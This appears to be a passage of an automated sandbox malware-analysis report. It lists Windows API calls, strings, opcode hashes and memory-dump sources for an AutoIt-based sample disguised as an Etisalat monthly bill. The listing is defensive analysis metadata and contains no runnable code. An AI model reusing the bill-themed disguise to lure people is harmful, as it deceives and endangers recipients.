                                      • ReleaseDC.USER32(?), ref: 00BA21D2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: CapsDesktopDeviceReleaseWindow
                                      • String ID:
                                      • API String ID: 2889604237-0
                                      • Opcode ID: 0c5c52f1e9f9af8b3ccc71130439d977b45e049d104a86a5213821d3e80f941c
                                      • Instruction ID: 1417645528ddd07c600ddbfd9e02b15c4d248d29a4b05a9254b715e43b9e7b87
                                      • Opcode Fuzzy Hash: 0c5c52f1e9f9af8b3ccc71130439d977b45e049d104a86a5213821d3e80f941c
                                      • Instruction Fuzzy Hash: FCE0E575800205EFEB019FA0C888AAD7BF5FB4C350F10C425F95AAB220CB388541DF40
                                      APIs
                                      • GetDesktopWindow.USER32 ref: 00BA219B
                                      • GetDC.USER32(00000000), ref: 00BA21A5
                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00BA21B1
                                      • ReleaseDC.USER32(?), ref: 00BA21D2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: CapsDesktopDeviceReleaseWindow
                                      • String ID:
                                      • API String ID: 2889604237-0
                                      • Opcode ID: 4f0e217d33c42042dccbf29dc0a15a9f315565661b0a9e93341617735febcc4a
                                      • Instruction ID: 92fcf5e3e7abafdb2ffb6ac81b0687f4643df7c6acbf7a17f45303dd91e5494d
                                      • Opcode Fuzzy Hash: 4f0e217d33c42042dccbf29dc0a15a9f315565661b0a9e93341617735febcc4a
                                      • Instruction Fuzzy Hash: D1E0EEB580020AAFDB019FA0C8886AD7BE6BB4C320F108029F95AAB220CB389541DF40
                                      APIs
                                      • OleSetContainedObject.OLE32(?,00000001), ref: 00BBB981
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ContainedObject
                                      • String ID: AutoIt3GUI$Container
                                      • API String ID: 3565006973-3941886329
                                      • Opcode ID: d4270fc94efdf199d01b9adecbcf6f6afc5ce2c78d851a7b393abc340f884162
                                      • Instruction ID: 2d01925d2c07bce4774c290d61763d639633661e4a04a1f71cf542d0f767efcb
                                      • Opcode Fuzzy Hash: d4270fc94efdf199d01b9adecbcf6f6afc5ce2c78d851a7b393abc340f884162
                                      • Instruction Fuzzy Hash: BE914D706006019FDB64DF64C884EBAB7E9FF49710F1485ADF94ACB6A1DBB0E840CB50
                                      APIs
                                        • Part of subcall function 00B7FEC6: _wcscpy.LIBCMT ref: 00B7FEE9
                                        • Part of subcall function 00B69997: __itow.LIBCMT ref: 00B699C2
                                        • Part of subcall function 00B69997: __swprintf.LIBCMT ref: 00B69A0C
                                      • __wcsnicmp.LIBCMT ref: 00BCB298
                                      • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00BCB361
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                      • String ID: LPT
                                      • API String ID: 3222508074-1350329615
                                      • Opcode ID: aabe29c851cc3fc46fbad06c588469ef9c6a7ec15e69e5f872b4b374e8d422d9
                                      • Instruction ID: f6bfde94443aa5d0542581dba6c1f05f91da968ee7fe05e1be7ca991f22d06ea
                                      • Opcode Fuzzy Hash: aabe29c851cc3fc46fbad06c588469ef9c6a7ec15e69e5f872b4b374e8d422d9
                                      • Instruction Fuzzy Hash: 8F615075A00215AFCB14DF94C886FAEB7F8EF48710F1540AEF946AB291DB74AE40CB54
                                      APIs
                                      • Sleep.KERNEL32(00000000), ref: 00B72AC8
                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 00B72AE1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: GlobalMemorySleepStatus
                                      • String ID: @
                                      • API String ID: 2783356886-2766056989
                                      • Opcode ID: 648b4e0b60c5494309207747b301bc05bf0863cb92c51903bcd6781cf6c99966
                                      • Instruction ID: 4197b343bd20c00d52b174402af0b77c6e64157fd59678b43bcdf388d4668ff6
                                      • Opcode Fuzzy Hash: 648b4e0b60c5494309207747b301bc05bf0863cb92c51903bcd6781cf6c99966
                                      • Instruction Fuzzy Hash: 2C514672418B449BD320AF50DC86BAFBBECFF84710F42889DF2D9511A5DB348529CB26
                                      APIs
                                        • Part of subcall function 00B6506B: __fread_nolock.LIBCMT ref: 00B65089
                                      • _wcscmp.LIBCMT ref: 00BC9AAE
                                      • _wcscmp.LIBCMT ref: 00BC9AC1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: _wcscmp$__fread_nolock
                                      • String ID: FILE
                                      • API String ID: 4029003684-3121273764
                                      • Opcode ID: efe9b1ca87ce0854fa2f39a066a68888c366059e405be77da4ae617d0f00b0f2
                                      • Instruction ID: e867b17a3eb0bb045bbc50d5abcdcc524c4c3fcf21c15ee0b8b3166602862954
                                      • Opcode Fuzzy Hash: efe9b1ca87ce0854fa2f39a066a68888c366059e405be77da4ae617d0f00b0f2
                                      • Instruction Fuzzy Hash: 3141B571A00619BAEF219AA4DC85FEFBBF9DF45710F0000B9B900A7181DA75AE1587A5
                                      APIs
                                      • _memset.LIBCMT ref: 00BD2892
                                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00BD28C8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: CrackInternet_memset
                                      • String ID: |
                                      • API String ID: 1413715105-2343686810
                                      • Opcode ID: 1133145e3ecb8d0db4dc0ab70d30253835997db8209fe81686339ba3a1002c12
                                      • Instruction ID: 10468cb45c2ea3f638a9e14f8a9a960d0509a4ab65141c30cf9026b9cc20cfe7
                                      • Opcode Fuzzy Hash: 1133145e3ecb8d0db4dc0ab70d30253835997db8209fe81686339ba3a1002c12
                                      • Instruction Fuzzy Hash: DB312C71800119AFCF01EFA1CC85EEEBFB9FF18310F1041AAF815A6265EB355A56DB60
                                      APIs
                                      • DestroyWindow.USER32(?,?,?,?), ref: 00BE6D86
                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00BE6DC2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Window$DestroyMove
                                      • String ID: static
                                      • API String ID: 2139405536-2160076837
                                      • Opcode ID: d59ddba888e331155fb3165b8dee8f6507b3adc633573cc516c096f8a4d70370
                                      • Instruction ID: dc10ec496c328167545422c1b0edb7d0b58de4ccf55087864faf68deb86e1617
                                      • Opcode Fuzzy Hash: d59ddba888e331155fb3165b8dee8f6507b3adc633573cc516c096f8a4d70370
                                      • Instruction Fuzzy Hash: 2D319C71200244AEDB109F69CC80BFB73E9FF98760F508669F8A687190DB31AC91CB60
                                      APIs
                                      • _memset.LIBCMT ref: 00BC2E00
                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00BC2E3B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: InfoItemMenu_memset
                                      • String ID: 0
                                      • API String ID: 2223754486-4108050209
                                      • Opcode ID: 8b2d7ea93548634699146acee38872bdc15b91941cc2da17ee3db518b20327d7
                                      • Instruction ID: f0ee650bacd1e828324166a99a4c0b623f5e3d9a3325328585c99d894474a7da
                                      • Opcode Fuzzy Hash: 8b2d7ea93548634699146acee38872bdc15b91941cc2da17ee3db518b20327d7
                                      • Instruction Fuzzy Hash: E731F531A0030AABEB24DF48C885FEEBBF9EF05340F1840ADE995A61A0D7709940CB20
                                      APIs
                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00BE69D0
                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00BE69DB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: Combobox
                                      • API String ID: 3850602802-2096851135
                                      • Opcode ID: 547495b8782f3f303a7ed05a312b9c4555f83d0ae14a8880096d0de097e9f399
                                      • Instruction ID: afaa18ee469c9f89b608a486b6f031a1db5c09c9d9676254e53b5ff6554a5f66
                                      • Opcode Fuzzy Hash: 547495b8782f3f303a7ed05a312b9c4555f83d0ae14a8880096d0de097e9f399
                                      • Instruction Fuzzy Hash: B41104753002486FEF118F25CC80FFB37AAEBA93E4F100264F9589B291D7319C9187A0
                                      APIs
                                        • Part of subcall function 00B61D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B61D73
                                        • Part of subcall function 00B61D35: GetStockObject.GDI32(00000011), ref: 00B61D87
                                        • Part of subcall function 00B61D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B61D91
                                      • GetWindowRect.USER32(00000000,?), ref: 00BE6EE0
                                      • GetSysColor.USER32(00000012), ref: 00BE6EFA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                      • String ID: static
                                      • API String ID: 1983116058-2160076837
                                      • Opcode ID: 4cfc81369325dbe6b0ae6c493ad8c155211b869cc4abe9f281e7e4876d64ef76
                                      • Instruction ID: 9834c1727dd109d42a84bd77d00120114f58ac6231ed7dc7e3bcb0b59c416559
                                      • Opcode Fuzzy Hash: 4cfc81369325dbe6b0ae6c493ad8c155211b869cc4abe9f281e7e4876d64ef76
                                      • Instruction Fuzzy Hash: 8821447261024AAFDB04DFA8DC45AFA7BF8EB18354F004668F955D3251E734E8619B60
                                      APIs
                                      • GetWindowTextLengthW.USER32(00000000), ref: 00BE6C11
                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00BE6C20
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: LengthMessageSendTextWindow
                                      • String ID: edit
                                      • API String ID: 2978978980-2167791130
                                      • Opcode ID: d604d77e7789c98615613a8d9aad45e7415d93819c41dd7851199d1f379a93e8
                                      • Instruction ID: 464d78387633ddd8f4b052240b64ccacfa1d0507992f8d3c9b600bb4b424fb2e
                                      • Opcode Fuzzy Hash: d604d77e7789c98615613a8d9aad45e7415d93819c41dd7851199d1f379a93e8
                                      • Instruction Fuzzy Hash: 28116D71500188ABEB104F759C86ABB37A9EB253B8F2047A4F961D71E0C775DC919760
                                      APIs
                                      • _memset.LIBCMT ref: 00BC2F11
                                      • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00BC2F30
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: InfoItemMenu_memset
                                      • String ID: 0
                                      • API String ID: 2223754486-4108050209
                                      • Opcode ID: 6964556fcf887fd254693e16589768b30c1ed89fecbcec2b40e9b3d55467a4ae
                                      • Instruction ID: d6a5e0ce2e30894c7b6ff934c3d8723dc78986088a44b19118077898fc45320f
                                      • Opcode Fuzzy Hash: 6964556fcf887fd254693e16589768b30c1ed89fecbcec2b40e9b3d55467a4ae
                                      • Instruction Fuzzy Hash: 42118B32901229ABDF21DB58DC84FA977F9EB15310F1840EDE855B72A0D7B0EE0587A1
                                      APIs
                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00BD2520
                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00BD2549
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Internet$OpenOption
                                      • String ID: <local>
                                      • API String ID: 942729171-4266983199
                                      • Opcode ID: 5c166fb29d405d7567fa8cfb326f6309e24f0a6f544e379fca08b18f17813f3a
                                      • Instruction ID: 8b5bae3a3847656212d918952ffc4e3ace83a3c8f4d506bd69737e429f5b9bf6
                                      • Opcode Fuzzy Hash: 5c166fb29d405d7567fa8cfb326f6309e24f0a6f544e379fca08b18f17813f3a
                                      • Instruction Fuzzy Hash: B011E3701012A5BADB258F519CD5EFBFFA8FB36355F10816BF90546240E2705981DAF0
                                      APIs
                                        • Part of subcall function 00BD830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00BD80C8,?,00000000,?,?), ref: 00BD8322
                                      • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00BD80CB
                                      • htons.WSOCK32(00000000,?,00000000), ref: 00BD8108
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWidehtonsinet_addr
                                      • String ID: 255.255.255.255
                                      • API String ID: 2496851823-2422070025
                                      • Opcode ID: 65ceb32d1602b672240208bf548410998ebda403f8ba2b7a32438005c7510534
                                      • Instruction ID: 190f7e43050bb48e27e2a76a3ef6c9a46bed231fa978de8413e806d436804091
                                      • Opcode Fuzzy Hash: 65ceb32d1602b672240208bf548410998ebda403f8ba2b7a32438005c7510534
                                      • Instruction Fuzzy Hash: AD118274500205ABDB20AF64CC86FFDF3A4EF04321F1085ABE911AB391EA71A815C755
                                      APIs
                                        • Part of subcall function 00B67F41: _memmove.LIBCMT ref: 00B67F82
                                        • Part of subcall function 00BBB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00BBB0E7
                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00BB9355
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ClassMessageNameSend_memmove
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 372448540-1403004172
                                      • Opcode ID: 6b3a9a7e167e0d49c32d51afa47e08be7fd8b3134e9366a746870485c8b21990
                                      • Instruction ID: cce8e125c3d5e62876933f93522703707ca9b5b62cb98912ebe991812ea45bf0
                                      • Opcode Fuzzy Hash: 6b3a9a7e167e0d49c32d51afa47e08be7fd8b3134e9366a746870485c8b21990
                                      • Instruction Fuzzy Hash: 6F01F171A45214ABCB04FBA0CCA1CFE77E9FF06320B1006A9F972672D2DFB559188650
                                      APIs
                                        • Part of subcall function 00B67F41: _memmove.LIBCMT ref: 00B67F82
                                        • Part of subcall function 00BBB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00BBB0E7
                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 00BB924D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ClassMessageNameSend_memmove
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 372448540-1403004172
                                      • Opcode ID: fc75e68d1b67fae5f5fca0f2e244c3405409653e649efc53aaf35dc766704979
                                      • Instruction ID: 4a0eb2143061ef621e788aae71a1708495b9edd53ce276b393ffbcd97e9f9e7d
                                      • Opcode Fuzzy Hash: fc75e68d1b67fae5f5fca0f2e244c3405409653e649efc53aaf35dc766704979
                                      • Instruction Fuzzy Hash: 1A018471E411047BCB14EBA0C9A2EFF77E9DF05300F2401A9BA1267292EEA55F189661
                                      APIs
                                        • Part of subcall function 00B67F41: _memmove.LIBCMT ref: 00B67F82
                                        • Part of subcall function 00BBB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00BBB0E7
                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 00BB92D0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ClassMessageNameSend_memmove
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 372448540-1403004172
                                      • Opcode ID: 1b68999d96886f6c75445e999d46624ab4d74c6ba67bb5e5b3c8301e35be716e
                                      • Instruction ID: 318777b0665fab73804f22616b51e7b93778b3b36ddf73aa8a9c161c1a1ee333
                                      • Opcode Fuzzy Hash: 1b68999d96886f6c75445e999d46624ab4d74c6ba67bb5e5b3c8301e35be716e
                                      • Instruction Fuzzy Hash: A601A271E811087BCB14EBA0C992EFF77ECDF11700F6401A5B91263282DAA55F1C9271
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
